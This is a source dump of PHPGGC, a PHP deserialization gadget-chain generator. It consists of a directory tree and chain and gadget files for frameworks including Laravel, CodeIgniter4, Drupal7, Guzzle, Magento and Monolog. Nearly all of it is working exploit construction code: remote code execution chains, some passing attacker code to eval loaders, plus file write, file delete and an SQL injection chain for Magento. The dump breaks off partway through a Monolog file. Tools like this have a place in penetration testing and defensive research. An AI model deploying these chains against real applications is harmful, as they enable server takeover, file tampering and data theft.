├── LICENSE ├── README.md ├── gadgetchains ├── CodeIgniter4 │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── Doctrine │ └── FW │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── Drupal7 │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Guzzle │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── INFO │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Horde │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Laminas │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── FW │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Laravel │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── Magento │ ├── FW │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── SQLI │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Monolog │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── PHPCSFixer │ └── FD │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 2 │ │ ├── chain.php │ │ └── gadgets.php ├── PHPExcel │ └── FD │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── 
gadgets.php │ │ └── 4 │ │ ├── chain.php │ │ └── gadgets.php ├── Phalcon │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Pydio │ └── Guzzle │ │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Slim │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Smarty │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── SSRF │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── SwiftMailer │ ├── FD │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── FW │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 4 │ │ ├── chain.php │ │ └── gadgets.php ├── Symfony │ ├── FW │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 5 │ │ ├── chain.php │ │ └── gadgets.php ├── TCPDF │ └── FD │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── ThinkPHP │ ├── FW │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 3 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 4 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 5 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 6 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 7 │ │ ├── chain.php │ │ └── gadgets.php ├── WordPress │ ├── Dompdf │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── Guzzle │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── P │ │ ├── EmailSubscribers │ │ │ └── RCE │ │ │ │ └── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ ├── 
EverestForms │ │ │ └── RCE │ │ │ │ └── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ ├── WooCommerce │ │ │ └── RCE │ │ │ │ ├── 1 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ │ │ └── 2 │ │ │ │ ├── chain.php │ │ │ │ └── gadgets.php │ │ └── YetAnotherStarsRating │ │ │ └── RCE │ │ │ └── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ ├── PHPExcel │ │ └── RCE │ │ │ ├── 1 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 2 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 3 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 4 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ ├── 5 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ │ │ └── 6 │ │ │ ├── chain.php │ │ │ └── gadgets.php │ └── generic │ │ └── gadgets.php ├── Yii │ └── RCE │ │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php ├── Yii2 │ └── RCE │ │ ├── 1 │ │ ├── chain.php │ │ └── gadgets.php │ │ ├── 2 │ │ ├── chain.php │ │ └── gadgets.php │ │ └── 3 │ │ ├── chain.php │ │ └── gadgets.php └── ZendFramework │ ├── FD │ └── 1 │ │ ├── chain.php │ │ └── gadgets.php │ └── RCE │ ├── 1 │ ├── chain.php │ └── gadgets.php │ ├── 2 │ ├── chain.php │ └── gadgets.php │ ├── 3 │ ├── chain.php │ └── gadgets.php │ ├── 4 │ ├── chain.php │ └── gadgets.php │ └── 5 │ ├── chain.php │ └── gadgets.php ├── lib ├── PHPGGC.php ├── PHPGGC │ ├── Enhancement │ │ ├── ASCIIStrings.php │ │ ├── Enhancement.php │ │ ├── Enhancements.php │ │ ├── FastDestruct.php │ │ ├── PlusNumbers.php │ │ └── Wrapper.php │ ├── Exception.php │ ├── GadgetChain.php │ ├── GadgetChain │ │ ├── FileDelete.php │ │ ├── FileRead.php │ │ ├── FileWrite.php │ │ ├── PHPInfo.php │ │ ├── RCE.php │ │ ├── RCE │ │ │ ├── Command.php │ │ │ ├── FunctionCall.php │ │ │ └── PHPCode.php │ │ ├── SSRF.php │ │ └── SqlInjection.php │ ├── InvalidArgumentsException.php │ ├── Phar │ │ ├── Format.php │ │ ├── Phar.php │ │ ├── Tar.php │ │ └── Zip.php │ └── Util.php └── test_payload.php ├── other └── debug_rce │ ├── debug_rce.php │ └── test.txt ├── phpggc ├── templates ├── chain.php └── gadgets.php └── 
test-gc-compatibility.py /gadgetchains/CodeIgniter4/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( 9 | new \CodeIgniter\Model( 10 | new \CodeIgniter\Database\BaseBuilder, 11 | new \CodeIgniter\Validation\Validation, 12 | $func 13 | ), 14 | $param 15 | ); 16 | } 17 | } 18 | } 19 | 20 | namespace CodeIgniter\Session\Handlers { 21 | class MemcachedHandler { 22 | protected $memcached; 23 | protected $lockKey; 24 | 25 | public function __construct($memcached, $param) { 26 | $this->lockKey = $param; 27 | $this->memcached = $memcached; 28 | } 29 | } 30 | } 31 | 32 | namespace CodeIgniter { 33 | class Model { 34 | protected $builder; 35 | protected $primaryKey; 36 | protected $beforeDelete; 37 | protected $validationRules; 38 | protected $validation; 39 | 40 | public function __construct($builder, $validation, $func) { 41 | $this->builder = $builder; 42 | $this->primaryKey = null; 43 | 44 | $this->beforeDelete = array(); 45 | $this->beforeDelete[] = "validate"; 46 | 47 | $this->validation = $validation; 48 | $this->validationRules = array( 49 | "id" => array( 50 | "rules" => array($func) 51 | ) 52 | ); 53 | } 54 | } 55 | } 56 | 57 | namespace CodeIgniter\Validation { 58 | class Validation { 59 | protected $ruleSetFiles; 60 | 61 | public function __construct() { 62 | $this->ruleSetFiles = array("finfo"); 63 | } 64 | } 65 | } 66 | 67 | namespace CodeIgniter\Database { 68 | class BaseBuilder { 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /gadgetchains/CodeIgniter4/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( 9 | new \CodeIgniter\Model( 10 | new \CodeIgniter\Database\BaseBuilder( 11 | new \CodeIgniter\Database\MySQLi\Connection 12 | ), 13 | new \CodeIgniter\Validation\Validation, 14 | $func, 15 
| new \CodeIgniter\Database\MySQLi\Connection 16 | ), 17 | array("x" => $param) 18 | ); 19 | } 20 | } 21 | } 22 | 23 | namespace CodeIgniter\Session\Handlers { 24 | class MemcachedHandler { 25 | protected $memcached; 26 | protected $lockKey; 27 | 28 | public function __construct($memcached, $param) { 29 | $this->lockKey = $param; 30 | $this->memcached = $memcached; 31 | } 32 | } 33 | } 34 | 35 | namespace CodeIgniter { 36 | class Model { 37 | protected $builder; 38 | protected $primaryKey; 39 | protected $beforeDelete; 40 | protected $validationRules; 41 | protected $validation; 42 | protected $tempAllowCallbacks; 43 | 44 | public function __construct($builder, $validation, $func, $db) { 45 | $this->builder = $builder; 46 | $this->primaryKey = null; 47 | 48 | $this->beforeDelete = array(); 49 | $this->beforeDelete[] = "validate"; 50 | 51 | $this->tempAllowCallbacks = 1; 52 | $this->db = $db; 53 | 54 | $this->cleanValidationRules = false; 55 | $this->validation = $validation; 56 | $this->validationRules = array( 57 | "id.x" => array( 58 | "rules" => array($func, "dd") // function "dd" exits the script. 59 | ) 60 | ); 61 | } 62 | } 63 | } 64 | 65 | namespace CodeIgniter\Validation { 66 | class Validation { 67 | protected $ruleSetFiles; 68 | 69 | public function __construct() { 70 | $this->ruleSetFiles = array("finfo"); 71 | } 72 | } 73 | } 74 | 75 | namespace CodeIgniter\Database { 76 | class BaseBuilder { 77 | public function __construct($db) { 78 | $this->QBFrom = array("()"); 79 | $this->db = $db; 80 | } 81 | } 82 | } 83 | 84 | namespace CodeIgniter\Database\MySQLi { 85 | class Connection { 86 | } 87 | } 88 | 89 | -------------------------------------------------------------------------------- /gadgetchains/Doctrine/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | extension)) 35 | $parameters['extension'] = '.' . 
$infos->extension; 36 | else 37 | $parameters['extension'] = ''; 38 | 39 | $parameters['directory'] = $infos->dirname; 40 | $parameters['path'] = $infos->dirname . '/e3/5b737464436c61737324434c4153534d455441444154415d5b315d' . $parameters['extension']; 41 | return $parameters; 42 | } 43 | 44 | public function generate(array $parameters) 45 | { 46 | $c = new Configuration([ 47 | 48 | ]); 49 | $table = (object) [ 50 | 'name' => $parameters['data'], 51 | 'schema' => '', 52 | 'indexes' => null, 53 | 'uniqueConstraints' => null, 54 | 'options' => null 55 | ]; 56 | $em0 = new EntityManager(null, $c); 57 | $d0 = new AnnotationDriver(new CachedReader([ 58 | 'stdClass' => 59 | [ 60 | 'Doctrine\ORM\Mapping\Embeddable' => true, 61 | 'Doctrine\ORM\Mapping\Table' => $table 62 | ] 63 | ])); 64 | $fc = new FilesystemCache($parameters['directory'], $parameters['extension']); 65 | $mf = new ClassMetadataFactory($fc, $em0, $d0); 66 | $em = new EntityManager($mf, null); 67 | $writer = new ResultSetMappingBuilder($em); 68 | 69 | return $writer; 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /gadgetchains/Doctrine/FW/2/chain.php: -------------------------------------------------------------------------------- 1 | deferredItems = ['x' => $CacheItem]; 12 | $this->cache = $FilesystemCache; 13 | } 14 | } 15 | class CacheItem 16 | { 17 | private $value; 18 | 19 | public function __construct($phpCode) 20 | { 21 | $this->value = $phpCode; 22 | } 23 | } 24 | } 25 | 26 | namespace Doctrine\Common\Cache 27 | { 28 | class FileCache 29 | { 30 | private $extension; 31 | protected $directory; 32 | private $umask = 0002; 33 | 34 | public function __construct($extension, $directory) 35 | { 36 | $this->extension = $extension; 37 | $this->directory = $directory; 38 | } 39 | } 40 | 41 | class FilesystemCache extends FileCache {} 42 | } 43 | -------------------------------------------------------------------------------- 
/gadgetchains/Drupal7/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | _temp_tarname = $_temp_tarname; 9 | } 10 | 11 | } 12 | -------------------------------------------------------------------------------- /gadgetchains/Drupal7/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | true, '#process'=>true, '#attached'=>true]; 7 | protected $storage = ['#form_id'=>'DrupalRCE','#process'=>['drupal_process_attached'], '#attached'=>[]]; 8 | 9 | public function __construct($function,$parameter) { 10 | $this->storage['#attached']+=[$function=>[[$parameter]]]; 11 | } 12 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | data = [ 12 | 'Expires' => 1, 13 | 'Discard' => false, 14 | 'Value' => $data 15 | ]; 16 | } 17 | } 18 | 19 | class CookieJar 20 | { 21 | private $cookies = []; 22 | private $strictMode; 23 | 24 | public function __construct($data) 25 | { 26 | $this->cookies = [new SetCookie($data)]; 27 | } 28 | } 29 | 30 | class FileCookieJar extends CookieJar 31 | { 32 | private $filename; 33 | private $storeSessionCookies = true; 34 | 35 | public function __construct($filename, $data) 36 | { 37 | parent::__construct($data); 38 | $this->filename = $filename; 39 | } 40 | } 41 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/INFO/1/chain.php: -------------------------------------------------------------------------------- 1 | _fn_close)) { 13 | call_user_func($this->_fn_close); 14 | } 15 | } 16 | 17 | public function close() 18 | { 19 | return call_user_func($this->_fn_close); 20 | } 21 | */ 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/Guzzle/RCE/1/chain.php: 
-------------------------------------------------------------------------------- 1 | [ 24 | new \GuzzleHttp\HandlerStack($function, $parameter), 25 | 'resolve' 26 | ] 27 | ]); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /gadgetchains/Guzzle/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | methods = $methods; 17 | 18 | foreach ($methods as $name => $fn) { 19 | $this->{'_fn_' . $name} = $fn; 20 | } 21 | } 22 | 23 | /* 24 | public function __destruct() 25 | { 26 | if (isset($this->_fn_close)) { 27 | call_user_func($this->_fn_close); 28 | } 29 | } 30 | 31 | public function close() 32 | { 33 | return call_user_func($this->_fn_close); 34 | } 35 | */ 36 | } 37 | } 38 | 39 | namespace GuzzleHttp 40 | { 41 | class HandlerStack 42 | { 43 | private $handler; 44 | private $stack; 45 | private $cached = false; 46 | 47 | function __construct($function, $parameter) 48 | { 49 | $this->stack = [[$function]]; 50 | $this->handler = $parameter; 51 | } 52 | 53 | /* 54 | public function resolve() 55 | { 56 | if (!$this->cached) { 57 | if (!($prev = $this->handler)) { 58 | throw new \LogicException('No handler has been specified'); 59 | } 60 | 61 | foreach (array_reverse($this->stack) as $fn) { 62 | $prev = $fn[0]($prev); 63 | } 64 | 65 | $this->cached = $prev; 66 | } 67 | 68 | return $this->cached; 69 | } 70 | */ 71 | } 72 | } -------------------------------------------------------------------------------- /gadgetchains/Horde/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /gadgetchains/Horde/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _oldConfig = $code; 9 | } 10 | } 11 | 12 | class Horde_Prefs_Scope implements Serializable 13 | { 14 | protected $_prefs = array(1); 15 | protected 
$scope; 16 | public function serialize() 17 | { 18 | return json_encode(array( 19 | $this->scope, 20 | $this->_prefs 21 | )); 22 | } 23 | 24 | public function unserialize($data) 25 | { 26 | list($this->scope, $this->_prefs) = json_decode($data, true); 27 | } 28 | } 29 | 30 | class Horde_Prefs 31 | { 32 | protected $_opts, $_scopes; 33 | function __construct($code) 34 | { 35 | $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig'); 36 | $this->_scopes['horde'] = new Horde_Prefs_Scope; 37 | } 38 | } 39 | 40 | class Horde_Prefs_Identity 41 | { 42 | protected $_prefs, $_prefnames, $_identities; 43 | function __construct($code) 44 | { 45 | $this->_identities = array(0); 46 | $this->_prefs = new Horde_Prefs($code); 47 | $this->_prefnames['identities'] = 0; 48 | } 49 | } 50 | 51 | class Horde_Kolab_Server_Decorator_Clean 52 | { 53 | private $_server, $_added; 54 | function __construct($code) 55 | { 56 | $this->_added = array(0); 57 | $this->_server = new Horde_Prefs_Identity($code); 58 | } 59 | } 60 | ?> 61 | -------------------------------------------------------------------------------- /gadgetchains/Laminas/FD/1/chain.php: -------------------------------------------------------------------------------- 1 | cleanup = '1'; 6 | $this->streamName = $remote_path; 7 | } 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /gadgetchains/Laminas/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | namespace = ''; 13 | $this->keyPattern = '/.*/'; 14 | } 15 | } 16 | 17 | class FilesystemOptions extends AdapterOptions 18 | { 19 | protected $cacheDir; 20 | protected $dirLevel; 21 | protected $suffix; 22 | 23 | function __construct($cacheDir, $extension) 24 | { 25 | parent::__construct(); 26 | $this->cacheDir = $cacheDir; 27 | $this->suffix = $extension; 28 | $this->dirLevel = 0; 29 | } 30 | } 31 | 32 | class Filesystem 33 | { 34 | protected $options; 35 | 36 | 
function __construct($options) 37 | { 38 | 39 | $this->options = $options; 40 | } 41 | } 42 | } 43 | 44 | namespace Laminas\Cache\Psr\CacheItemPool 45 | { 46 | class CacheItemPoolDecorator 47 | { 48 | protected $storage; 49 | protected $deferred; 50 | 51 | function __construct($storage, $deferred) 52 | { 53 | $this->storage = $storage; 54 | $this->deferred = $deferred; 55 | } 56 | } 57 | 58 | class CacheItem 59 | { 60 | protected $key; 61 | protected $value; 62 | 63 | function __construct($key, $value) 64 | { 65 | $this->key = $key; 66 | $this->value = $value; 67 | } 68 | } 69 | } 70 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | callback = "file_put_contents"; 11 | $this->request = $file; 12 | $this->provider = $data; 13 | } 14 | } 15 | } 16 | 17 | namespace Illuminate\Queue { 18 | class QueueManager 19 | { 20 | protected $app; 21 | protected $connectors; 22 | 23 | public function __construct($file, $data) { 24 | $this->app = [ 25 | 'config'=>[ 26 | 'queue.default'=>'aaa', 27 | 'queue.connections.aaa'=>[ 28 | 'driver'=>'bbb' 29 | ], 30 | ] 31 | ]; 32 | 33 | $file = new \Illuminate\Auth\RequestGuard($file, $data); 34 | $this->connectors = [ 35 | 'bbb'=>[ 36 | $file, "user" 37 | ] 38 | ]; 39 | } 40 | } 41 | } 42 | 43 | namespace Symfony\Component\Routing\Loader\Configurator { 44 | class ImportConfigurator 45 | { 46 | private $parent; 47 | private $route; 48 | 49 | public function __construct($file, $data) 50 | { 51 | $this->parent = new \Illuminate\Queue\QueueManager($file, $data); 52 | $this->route = null; 53 | } 54 | } 55 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $cmd; 14 | } 15 | } 16 | } 17 | 18 | 19 | 
namespace Faker 20 | { 21 | class Generator 22 | { 23 | protected $formatters; 24 | 25 | function __construct($function) 26 | { 27 | $this->formatters = ['dispatch' => $function]; 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $parameter; 14 | } 15 | } 16 | } 17 | 18 | 19 | namespace Illuminate\Events 20 | { 21 | class Dispatcher 22 | { 23 | protected $listeners; 24 | 25 | function __construct($function, $parameter) 26 | { 27 | $this->listeners = [ 28 | $parameter => [$function] 29 | ]; 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/3/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 12 | } 13 | } 14 | } 15 | 16 | 17 | namespace Illuminate\Notifications 18 | { 19 | class ChannelManager 20 | { 21 | protected $app; 22 | protected $defaultChannel; 23 | protected $customCreators; 24 | 25 | function __construct($function, $parameter) 26 | { 27 | $this->app = $parameter; 28 | $this->customCreators = ['x' => $function]; 29 | $this->defaultChannel = 'x'; 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/4/chain.php: -------------------------------------------------------------------------------- 1 | events = $events; 13 | $this->event = $event; 14 | } 15 | } 16 | } 17 | 18 | 19 | namespace Illuminate\Validation 20 | { 21 | class Validator 22 | { 23 | public $extensions; 24 | 25 | function __construct($function) 26 | { 27 | $this->extensions = ['' => $function]; 28 | } 29 | } 30 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/5/chain.php: 
-------------------------------------------------------------------------------- 1 | '; 18 | return new \Illuminate\Broadcasting\PendingBroadcast($code); 19 | } 20 | } -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/5/gadgets.php: -------------------------------------------------------------------------------- 1 | queueResolver = [new \Mockery\Loader\EvalLoader(), 'load']; 9 | } 10 | } 11 | } 12 | 13 | namespace Illuminate\Broadcasting { 14 | class PendingBroadcast { 15 | protected $events; 16 | protected $event; 17 | 18 | function __construct($evilCode) 19 | { 20 | $this->events = new \Illuminate\Bus\Dispatcher(); 21 | $this->event = new BroadcastEvent($evilCode); 22 | } 23 | } 24 | 25 | class BroadcastEvent { 26 | public $connection; 27 | 28 | function __construct($evilCode) 29 | { 30 | $this->connection = new \Mockery\Generator\MockDefinition($evilCode); 31 | } 32 | 33 | } 34 | } 35 | 36 | namespace Mockery\Loader { 37 | class EvalLoader {} 38 | } 39 | 40 | namespace Mockery\Generator { 41 | class MockDefinition { 42 | protected $config; 43 | protected $code; 44 | 45 | function __construct($evilCode) 46 | { 47 | $this->code = $evilCode; 48 | $this->config = new MockConfiguration(); 49 | } 50 | } 51 | 52 | class MockConfiguration { 53 | protected $name = 'abcdefg'; 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/6/chain.php: -------------------------------------------------------------------------------- 1 | '; 21 | $expected = new \Illuminate\Broadcasting\PendingBroadcast($code); 22 | $res = new \Illuminate\Support\MessageBag($expected); 23 | return $res; 24 | 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/6/gadgets.php: -------------------------------------------------------------------------------- 1 | queueResolver = [new 
\Mockery\Loader\EvalLoader(), 'load']; 9 | } 10 | } 11 | } 12 | 13 | namespace Illuminate\Broadcasting { 14 | class PendingBroadcast { 15 | protected $events; 16 | protected $event; 17 | 18 | function __construct($evilCode) 19 | { 20 | $this->events = new \Illuminate\Bus\Dispatcher(); 21 | $this->event = new BroadcastEvent($evilCode); 22 | } 23 | } 24 | 25 | class BroadcastEvent { 26 | public $connection; 27 | 28 | function __construct($evilCode) 29 | { 30 | $this->connection = new \Mockery\Generator\MockDefinition($evilCode); 31 | } 32 | 33 | } 34 | } 35 | 36 | namespace Illuminate\Support { 37 | class MessageBag { 38 | protected $messages = []; 39 | protected $format; 40 | 41 | function __construct($inner) { 42 | $this->format = $inner; 43 | } 44 | } 45 | } 46 | 47 | namespace Mockery\Loader { 48 | class EvalLoader {} 49 | } 50 | 51 | namespace Mockery\Generator { 52 | class MockDefinition { 53 | protected $config; 54 | protected $code; 55 | 56 | function __construct($evilCode) 57 | { 58 | $this->code = $evilCode; 59 | $this->config = new MockConfiguration(); 60 | } 61 | } 62 | 63 | class MockConfiguration { 64 | protected $name = 'abcdefg'; 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /gadgetchains/Laravel/RCE/7/chain.php: -------------------------------------------------------------------------------- 1 | events = new \Illuminate\Bus\Dispatcher($function); 13 | $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter); 14 | } 15 | } 16 | } 17 | 18 | namespace Illuminate\Bus 19 | { 20 | class Dispatcher 21 | { 22 | protected $queueResolver; 23 | 24 | public function __construct($function) 25 | { 26 | $this->queueResolver = $function; 27 | 28 | } 29 | } 30 | } 31 | 32 | namespace Illuminate\Queue 33 | { 34 | class CallQueuedClosure 35 | { 36 | protected $connection; 37 | 38 | public function __construct($parameter) 39 | { 40 | $this->connection = $parameter; 41 | } 42 | } 43 | } 44 | 45 | 46 | 
-------------------------------------------------------------------------------- /gadgetchains/Magento/FW/1/chain.php: -------------------------------------------------------------------------------- 1 | is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; 11 | 12 | public function generate(array $parameters) 13 | { 14 | $parameters = parent::process_parameters($parameters); 15 | 16 | $file = $parameters['remote_path']; 17 | $payload = $parameters['data']; 18 | 19 | return new \Zend_Memory_Manager($file, $payload); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /gadgetchains/Magento/FW/1/gadgets.php: -------------------------------------------------------------------------------- 1 | _backend = new Varien_Cache_Backend_Eaccelerator( 8 | new Zend_Log ( 9 | new Zend_CodeGenerator_Php_File($file, $payload) 10 | ) 11 | ); 12 | } 13 | } 14 | 15 | class Varien_Cache_Backend_Eaccelerator { 16 | protected $_directives; 17 | 18 | function __construct($x) { 19 | $this->_directives = array(); 20 | $this->_directives["logging"] = true; 21 | $this->_directives["logger"] = $x; 22 | } 23 | } 24 | 25 | class Zend_Log { 26 | protected $_writers; 27 | protected $_priorities; 28 | 29 | function __construct($writer) { 30 | $this->_writers = array(); 31 | $this->_writers[0] = $writer; 32 | 33 | $this->_priorities = array(); 34 | $this->_priorities[3] = 1; 35 | $this->_priorities[4] = 1; 36 | } 37 | } 38 | 39 | class Zend_CodeGenerator_Php_File { 40 | protected $_filename; 41 | protected $_sourceContent; 42 | protected $_isSourceDirty; 43 | 44 | function __construct($fn, $payload) { 45 | $this->_filename= $fn; 46 | $this->_sourceContent = $payload; 47 | $this->_isSourceDirty = false; 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /gadgetchains/Magento/SQLI/1/chain.php: 
-------------------------------------------------------------------------------- 1 | connected = true; 11 | $this->redis = $redis; 12 | } 13 | } 14 | 15 | class Mage_Sales_Model_Order_Payment_Transaction 16 | { 17 | protected $_isFailsafe; 18 | protected $_paymentObject; 19 | protected $_data; 20 | protected $_resourceName; 21 | protected $_idFieldName; 22 | 23 | public function __construct($sql) 24 | { 25 | $this->_isFailsafe = true; 26 | $this->_paymentObject = new Mage_Sales_Model_Order_Payment; 27 | $this->_data = [ 28 | 'order_id' => 1, 29 | 'store_id' => new Zend_Db_Expr('1); ' . $sql . ';--') 30 | ]; 31 | $this->_resourceName = 'log/log'; 32 | $this->_idFieldName = 'id'; 33 | } 34 | } 35 | 36 | class Zend_Db_Expr 37 | { 38 | protected $_expression; 39 | 40 | public function __construct($expression) 41 | { 42 | $this->_expression = $expression; 43 | } 44 | } 45 | 46 | class Mage_Sales_Model_Order_Payment 47 | { 48 | protected $_idFieldName; 49 | 50 | public function __construct() 51 | { 52 | $this->_idFieldName = 'id'; 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/1/chain.php: -------------------------------------------------------------------------------- 1 | null] 20 | ) 21 | ); 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/1/gadgets.php: -------------------------------------------------------------------------------- 1 | socket = $x; 12 | } 13 | } 14 | 15 | class BufferHandler 16 | { 17 | protected $handler; 18 | protected $bufferSize = -1; 19 | protected $buffer; 20 | # ($record['level'] < $this->level) == false 21 | protected $level = null; 22 | protected $initialized = true; 23 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 24 | protected $bufferLimit = -1; 25 | protected $processors; 26 | 27 | function __construct($methods, $command) 28 | { 29 | 
$this->processors = $methods; 30 | $this->buffer = [$command]; 31 | $this->handler = $this; 32 | } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/2/chain.php: -------------------------------------------------------------------------------- 1 | null] 20 | ) 21 | ); 22 | } 23 | } -------------------------------------------------------------------------------- /gadgetchains/Monolog/RCE/2/gadgets.php: -------------------------------------------------------------------------------- 1 | socket = $x; 13 | } 14 | } 15 | 16 | class BufferHandler 17 | { 18 | protected $handler; 19 | protected $bufferSize = -1; 20 | protected $buffer; 21 | # ($record['level'] < $this->level) == false 22 | protected $level = null; 23 | protected $initialized = true; 24 | # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false 25 | protected $bufferLimit = -1; 26 | protected $processors; 27 | 28 | function __construct($methods, $command) 